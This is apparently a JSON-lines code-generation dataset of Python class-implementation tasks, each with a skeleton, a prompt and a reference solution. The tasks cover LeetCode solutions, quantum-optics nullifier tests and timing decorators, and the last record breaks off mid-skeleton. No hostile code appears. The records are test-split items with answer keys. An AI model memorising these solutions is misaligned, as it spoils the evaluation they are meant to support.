else:\n self.d[elem] = [i]\n\n def query(self, left, right, value):\n \"\"\":type left: int :type right: int :type value: int :rtype: int\"\"\"\n if value not in self.d.keys():\n return 0\n res = 0\n for ind in self.d[value]:\n if left <= ind <= right:\n res += 1\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "_CodeTopics/LeetCode_contest/weekly/weekly2021/268/TLE--268_3.py", "source_repo": "BIAOXYZ/variousCodes", "split": "test", "star_events_count": 0} {"blob_id": "cf0f0d60a1504f875cffb931bafc08cb7349e0e2", "bodies": ["self.max = float('-inf')\nself.helper(root)\nreturn self.max", "if node is None:\n return (float('-inf'), float('inf'))\nleft_max, left_min = self.helper(node.left)\nright_max, right_min = self.helper(node.right)\ndescent_max = max(left_max, right_max)\ndescent_min = min(left_min, right_min)\nif descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\nif descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\nreturn (max(descent_max, node.val), min(descent_min, node.val))"], "bodies_text": "<|body_start_0|>\n self.max = float('-inf')\n self.helper(root)\n return self.max\n<|end_body_0|>\n\n<|body_start_1|>\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.max = float('-inf')\n self.helper(root)\n return self.max\n<|end_body_0|>\n\n<|body_start_1|>\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000115", "length_bytes": 2711, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: int", "name": "maxAncestorDiff", "signature": "def maxAncestorDiff(self, root)"}, {"docstring": "return the maximum and minimun node value of all descendants of parameter `node`", "name": "helper", "signature": "def helper(self, node)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000392", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAncestorDiff(self, root): :type root: TreeNode :rtype: int\n- def helper(self, node): return the maximum and minimun node value of all descendants of parameter `node`", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAncestorDiff(self, root): :type root: TreeNode :rtype: int\n- def helper(self, node): return the maximum and minimun node value of all descendants of parameter `node`\n\n<|skeleton|>\nclass Solution:\n\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.max = float('-inf')\n self.helper(root)\n return self.max\n<|end_body_0|>\n\n<|body_start_1|>\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n<|end_body_1|>\n", "revision_id": "34a78e06d493e61b21d4442747e9102abf9b319b", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxAncestorDiff(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n self.max = float('-inf')\n self.helper(root)\n return self.max\n\n def helper(self, node):\n \"\"\"return the maximum and minimun node value of all descendants of parameter `node`\"\"\"\n if node is None:\n return (float('-inf'), float('inf'))\n left_max, left_min = self.helper(node.left)\n right_max, right_min = self.helper(node.right)\n descent_max = max(left_max, right_max)\n descent_min = min(left_min, right_min)\n if descent_max != float('-inf'):\n self.max = max(abs(node.val - descent_max), self.max)\n if descent_min != float('inf'):\n self.max = max(abs(node.val - descent_min), self.max)\n return (max(descent_max, node.val), min(descent_min, node.val))\n", "source": "the_stack_v2_python_sparse", "source_path": "1026_Maximum_Differnce_Between_Node_and_Ancestor.py", "source_repo": "sunnyyeti/Leetcode-solutions", "split": "test", "star_events_count": 0} {"blob_id": "311b4c55f3f2c3d0fbc1a9d7913350227fabc42a", "bodies": ["np.random.seed(42)\nvac_modes = 1\nsq_r = 5.0\nc = 2\nshots = 100\nalpha = [0, np.pi / 4] * c\nphi = [np.pi / 2, 0] * c\ntheta = [np.pi / 2, 0, 0, np.pi / 2]\ntimebins_per_shot = len(alpha)\nsamples = singleloop(sq_r, alpha, phi, theta, shots)\nreshaped_samples = move_vac_modes(samples, 2, crop=True)\nX0 = reshaped_samples[:, 0, 0]\nX1 = reshaped_samples[:, 0, 1]\nP2 = reshaped_samples[:, 0, 2]\nP3 = reshaped_samples[:, 0, 3]\nrtol = 5 / np.sqrt(shots)\nminusstdX1X0 = (X1 - X0).var()\nplusstdX1X0 = (X1 + X0).var()\nsqueezed_std = np.exp(-2 * sq_r)\nexpected_minus = sf.hbar * squeezed_std\nexpected_plus = sf.hbar / squeezed_std\nassert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\nassert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\nminusstdP2P3 = (P2 - P3).var()\nplusstdP2P3 = (P2 + P3).var()\nassert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\nassert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)", "np.random.seed(42)\nvac_modes = 1\nn = 4\nshots = 100\nsq_r = 5\nalpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\nalpha[0] = 0.0\nphi = [0] * n\nphi[0] = np.pi / 2\ntimebins_per_shot = len(alpha)\ntheta = [0] * n\nsamples_X = singleloop(sq_r, alpha, phi, theta, shots)\nreshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\ntheta = [np.pi / 2] * n\nsamples_P = singleloop(sq_r, alpha, phi, theta, shots)\nreshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\nnullifier_X = lambda sample: (sample - sample[-1])[:-1]\nval_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\nassert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\nval_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\nassert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))", "np.random.seed(42)\nvac_modes = 1\nn = 20\nshots = 100\nsq_r = 3\nalpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\nalpha = [alpha_c] * n\nalpha[0] = 0.0\nphi = [np.pi / 2] * n\ntheta = [0, np.pi / 2] * (n // 2)\ntimebins_per_shot = len(alpha)\nreshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\nnullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\nnullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\ndelta = np.var(nullifier_samples, axis=0)\nassert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))"], "bodies_text": "<|body_start_0|>\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n<|end_body_0|>\n\n<|body_start_1|>\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_1|>\n\n<|body_start_2|>\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_2|>\n", "class_docstring": "Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.", "class_name": "TestSingleLoopNullifier", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n <|body_0|>\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_1|>\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n<|end_body_0|>\n\n<|body_start_1|>\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_1|>\n\n<|body_start_2|>\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000116", "length_bytes": 29620, "license_type": "permissive", "methods": [{"docstring": "Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples", "name": "test_epr", "signature": "def test_epr(self)"}, {"docstring": "Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530", "name": "test_ghz", "signature": "def test_ghz(self)"}, {"docstring": "Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530", "name": "test_one_dimensional_cluster", "signature": "def test_one_dimensional_cluster(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003048", "prompt": "Implement the Python class `TestSingleLoopNullifier` described below.\n\nClass description:\nGroups tests where a nullifier associated with a state generated by a oneloop setup is checked.\n\nMethod signatures and docstrings:\n- def test_epr(self): Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\n- def test_ghz(self): Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\n- def test_one_dimensional_cluster(self): Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530", "prompted_full_text": "Implement the Python class `TestSingleLoopNullifier` described below.\n\nClass description:\nGroups tests where a nullifier associated with a state generated by a oneloop setup is checked.\n\nMethod signatures and docstrings:\n- def test_epr(self): Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\n- def test_ghz(self): Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\n- def test_one_dimensional_cluster(self): Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\n\n<|skeleton|>\nclass TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n <|body_0|>\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_1|>\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n<|end_body_0|>\n\n<|body_start_1|>\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_1|>\n\n<|body_start_2|>\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_2|>\n", "revision_id": "0c1c805fd5dfce465a8955ee3faf81037023a23e", "skeleton": "<|skeleton|>\nclass TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n <|body_0|>\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_1|>\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n", "source": "the_stack_v2_python_sparse", "source_path": "artifacts/old_dataset_versions/original_commits/strawberryfields/strawberryfields#611/before/test_tdmprogram.py", "source_repo": "MattePalte/Bugs-Quantum-Computing-Platforms", "split": "test", "star_events_count": 4} {"blob_id": "dd24ee8c8805e85348974c914551a1525393978c", "bodies": ["def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\nreturn wrapper", "@wraps(f)\ndef wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\nreturn wrapp", "def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\nreturn wrapp", "@wraps(f)\ndef wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\nreturn wrapp", "@wraps(f)\ndef wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\nwrapp.value = False\nreturn wrapp"], "bodies_text": "<|body_start_0|>\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n<|end_body_0|>\n\n<|body_start_1|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n<|end_body_1|>\n\n<|body_start_2|>\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n<|end_body_2|>\n\n<|body_start_3|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n<|end_body_3|>\n\n<|body_start_4|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n<|end_body_4|>\n", "class_docstring": "", "class_name": "Decorators", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Decorators:\n\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_0|>\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_1|>\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n <|body_2|>\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n 